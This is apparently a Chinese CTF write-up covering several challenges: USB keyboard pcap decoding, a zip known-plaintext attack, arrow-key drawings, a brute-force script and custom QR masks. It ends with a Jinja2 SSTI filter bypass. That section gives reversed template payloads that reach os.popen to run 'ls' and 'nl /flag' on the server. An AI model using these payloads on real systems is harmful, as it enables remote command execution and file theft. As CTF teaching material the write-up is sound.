import re
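key_pattern = re.compile('KeyDown "(.*?)"')


def extract_keys(lines):
    """Return the lower-cased key name of every ``KeyDown "<key>"`` event in *lines*.

    Lines without a KeyDown event are skipped; only the first match per line
    is kept.
    """
    keys = []
    for line in lines:
        found = key_pattern.findall(line)
        if found:
            keys.append(found[0].lower())
    return keys


def render_keystrokes(keys):
    """Turn a list of lower-cased key names into the text that was typed.

    'shift' is dropped, 'space' becomes ' ' and the 'num ' prefix of numpad
    keys is removed. 'backspace' deletes the previously rendered token rather
    than emitting a literal backspace control character: printing that
    character only moves the terminal cursor, so the reconstruction still
    showed the corrected typos.
    """
    out = []
    for key in keys:
        if key == 'backspace':
            if out:
                out.pop()
            continue
        text = key.replace('shift', '').replace('space', ' ').replace('num ', '')
        # Keys that render to nothing (e.g. a bare 'shift') must not occupy a
        # slot, or a later backspace would delete them instead of a character.
        if text:
            out.append(text)
    return ''.join(out)


if __name__ == '__main__':
    with open('secret.Q', 'r') as r:
        keys = extract_keys(r.readlines())
    print(keys)
    print(render_keystrokes(keys))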
if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it’s time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef
if you want to decrypt the zip file.you need to geyt t the key.
i am a very good person.so i i will give you the key dirte ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it 's time to give you the key.the key is 123456 .oh1 sorr sorry.
this is the key of my vba banc k card password.
the ture t rue key is 6 e187 bef.
the key2 is 323 d1 a4 b 6 e187 bef.
the key3 is f 0 6 7 e c 9 4 64187 bef
得到已知明文攻击的三个密钥
6e187bef
323d1a4b
f067ec94
# Dump the HID report payload (usbhid.data) of every USB packet, one per line.
tshark -r 'keyboard.pcapng' -T fields -e 'usbhid.data' >usbdata.txt
得到的usbdata.txt中发现数据是4f,50,51,52,并不在一般键盘按键的范围内,于是查找键盘按键对照表:https://max.book118.com/html/2017/0407/99227972.shtm
发现对应的是箭头
→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓
from PIL import Image
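hex_stream = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"

# One HID keycode per hex pair: 4f/50/51/52 are the right/left/down/up arrow
# keys, 00 separates one drawn character from the next.
STEP = 6   # pixels drawn per arrow press
ROW = 5    # starting row of every character
GAP = 10   # horizontal gap inserted after each 00 separator


def trace_path(stream, step=STEP, row=ROW, gap=GAP):
    """Return the list of (x, y) pixels lit by replaying an arrow-key trace.

    *stream* is the hex string of HID keycodes. The cursor starts at (0, row);
    each arrow press moves it *step* pixels in that direction, lighting every
    pixel passed, and a 00 keycode resets the row and jumps *gap* pixels to
    the right. Unknown keycodes are ignored. Every complete hex pair is
    examined (the original loop stopped one pair short of the end).
    """
    moves = {'4f': (1, 0), '51': (0, 1), '50': (-1, 0), '52': (0, -1)}
    points = []
    x, y = 0, row
    for idx in range(0, len(stream) - len(stream) % 2, 2):
        code = stream[idx:idx + 2].lower()
        if code == '00':
            y = row
            x += gap
            continue
        if code not in moves:
            continue
        dx, dy = moves[code]
        for _ in range(step):
            x += dx
            y += dy
            points.append((x, y))
    return points


if __name__ == '__main__':
    size = len(hex_stream)
    img = Image.new('RGB', (size, size))
    for x, y in trace_path(hex_stream):
        img.putpixel((x, y), (255, 255, 255))
    img.show()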
2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
import binascii
from libnum import *
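flag = 2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637


def int_to_bytes(value):
    """Return the big-endian byte string of a non-negative integer.

    Stdlib replacement for the libnum.n2s call; 0 yields a single zero byte.
    """
    length = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(length, 'big')


print(int_to_bytes(flag))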
import libnum
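# HID keycodes of the arrow keys mapped onto numpad-style direction digits
# (0x52 up -> 8, 0x51 down -> 2, 0x50 left -> 4, 0x4f right -> 6); 0x00
# separates one drawn digit from the next.
ARROW_TO_DIRECTION = {0x52: "8", 0x51: "2", 0x50: "4", 0x4f: "6", 0x00: " "}

# Direction sequence that traces each decimal digit.
DRAW_TO_DIGIT = {
    "622488": "0", "22": "1", "62426": "2", "624624": "3", "26822": "4",
    "642624": "5", "22684": "6", "622": "7", "62426848": "8", "622848": "9",
}


def arrow_sequence(capture, start=1340, stride=0x80, key_offset=57):
    """Extract the direction-digit string from a raw capture file.

    Frames are assumed to lie *stride* bytes apart starting at byte *start*,
    with the HID keycode at *key_offset* inside each frame (the defaults are
    the values fitted to keyboard.pcapng). Keycodes other than the arrows and
    the separator are ignored, and a frame whose keycode byte would lie past
    the end of *capture* is skipped instead of raising IndexError.
    """
    digits = []
    pos = start
    while pos + key_offset < len(capture):
        digits.append(ARROW_TO_DIRECTION.get(capture[pos + key_offset], ""))
        pos += stride
    return "".join(digits)


def strokes_to_digits(sequence):
    """Translate space-separated direction runs into the digits they draw.

    The text after the final separator is discarded. Raises ValueError naming
    the run when a run matches no known digit.
    """
    out = []
    for run in sequence.split(" ")[:-1]:
        try:
            out.append(DRAW_TO_DIGIT[run])
        except KeyError:
            raise ValueError("unrecognised stroke sequence: " + repr(run)) from None
    return "".join(out)


if __name__ == "__main__":
    with open("keyboard.pcapng", "rb") as capture_file:
        capture = capture_file.read()
    print(libnum.n2s(int(strokes_to_digits(arrow_sequence(capture)))))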
b = []
a = ...  # placeholder: the data to reverse was omitted from the page
for item in a:
    b.append(item)
# Reverse the collected items without manual index arithmetic.
c = list(reversed(b))
with open('a.txt', 'w') as w:
    w.write(''.join(c))
删去文件头前多余的00,得到正常文件
解压后发现是一个word,修改压缩包后缀,改为 .doc
打开后发现是一首歌的歌词,搜索原歌词并逐词比对,把拼错的单词中缺少的字母提取出来
hylqeygvs
根据题目的提示信息,需要爆破字母的排列顺序
官方 exp
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib
# table[ch] is the alphabet rotated to start at ch; encrypt() indexes it to
# shift a plaintext letter by the key letter's position.
table = {ch: uppercase[idx:] + uppercase[:idx] for idx, ch in enumerate(uppercase)}

# deTable maps 'A' to itself and reflects every other letter around the end
# of the alphabet ('B' -> 'Z', 'C' -> 'Y', ..., 'Z' -> 'B').
start = 'Z'
deTable = {'A': 'A'}
for idx, ch in enumerate(uppercase):
    if idx == 0:
        continue
    deTable[ch] = chr(ord(start) + 1 - idx)
def deKey(key):
    """Map each letter of *key* through the module-level deTable and join the result."""
    return ''.join(deTable[ch] for ch in key)
def encrypt(plainText, key):
    """Shift every uppercase letter of *plainText* by the cycling letters of *key*.

    Uses the module-level `table`: the output letter is table[k][i], where k is
    the next key letter and i the plaintext letter's alphabet index. Characters
    outside 'A'..'Z' are copied unchanged and do not consume a key letter.
    """
    keyStream = cycle(key)
    out = []
    for ch in plainText:
        if not ('A' <= ch <= 'Z'):
            out.append(ch)
            continue
        row = table[next(keyStream)]
        out.append(row[uppercase.index(ch)])
    return ''.join(out)
# Key string from the challenge; deKey() turns it into the letters that
# encrypt() actually cycles through.
key = 'TREX'
keys = deKey(key)
def Pailie(list1, start, end):
    """Enumerate every arrangement of list1[start:end + 1] by in-place swaps.

    At each leaf the candidate is joined, encrypted with the module-level
    `keys` and hashed with MD5; a digest beginning with "5613a" is printed.
    The list is restored after each recursive call, so the caller's list is
    unchanged when the function returns.
    """
    if start != end:
        for i in range(start, end + 1):
            list1[start], list1[i] = list1[i], list1[start]
            Pailie(list1, start + 1, end)
            list1[start], list1[i] = list1[i], list1[start]
        return
    candidate = "".join(list1)
    digest = hashlib.md5(encrypt(candidate, keys).encode()).hexdigest()
    if digest.startswith("5613a"):
        print(digest)
# The letters extracted from the lyrics (hylqeygvs), order unknown: try every
# arrangement.
mw = list('HYLEVSGQY')
Pailie(mw, 0, len(mw) - 1)
zip 附加了一个 rar,把 rar 提取出来,得到自定义掩码的运算规则
mask0:(i+j) % 2
mask1:j % 2
mask2:i % 3
mask3:(i+j) % 3
mask4:(i//3+j//2)%2
mask5:(i*j)%3+(i*j)%2
mask6:((i*j)%3+i*j)%2
mask7:((i*j)%3+i+j)%2
mask8:(i*j) % 2
mask9:(i*j) % 3
mask10:(i^j) % 3
mask11:(i^j) % 2
mask12:(i//3+j//2)%3
mask13:(i^j)%3+(i^j)%2
mask14:((i^j)%3+i^j)%2
mask15:((i^j)%3+i+j)%2
这里就是重新定义的16种掩码,前8种是原始的掩码生成方式,只是换了一下顺序,所以扫描所有二维码时,可能会发现有的二维码仍然能直接扫出来,那是因为生成时刚好随机到了它原来的掩码
把任意一个二维码的 png 放入 stegsolve 中,可以发现在 r0 的左上角有隐写痕迹
多看几张图,可以发现就只有前四格存在隐写,结合描述说掩码的识别特征不在二维码区域,所以可以知道这个4位的数据就是16种掩码的特征位…
应该是ssti,发现了一大堆过滤,发现它只会检测我们传过去的原生数据,不会检测那边反转好的字符串,如果我们传入反转后的即可绕过
# The page states the target reverses its input, so the template is emitted
# back-to-front here.
template = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''
output = ''.join(reversed(template))
print(output)
发送反转后的payload
得到类列表,然后将返回的列表内容复制进脚本寻找可利用的类
import json
a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""
num = 0
# Drop newlines and commas, then cut the pasted listing into one entry per
# closing '>'; whatever follows the last '>' is kept in `result` but not listed.
cleaned = a.replace("\n", "").replace(",", "")
segments = cleaned.split(">")
allList = [segment + ">" for segment in segments[:-1]]
result = segments[-1]
for k, v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k) + "--->" + v)
{% print "".__class__ .__bases__ [0 ].__subclasses__ ()[132 ].__init__ .__globals__ ['popen' ]('ls' ).read()%}
}%)(daer.)'galf/ ln'(]'nepop'[__slabolg__ .__tini__ .]231[)(__sessalcbus__ .]0[__sesab__ .__ssalc__ ."" tnirp %{
这里过滤了很多读取文件的命令,可以利用nl的绕过过滤读取文件(后测试用grep和rev等命令也可以读取flag)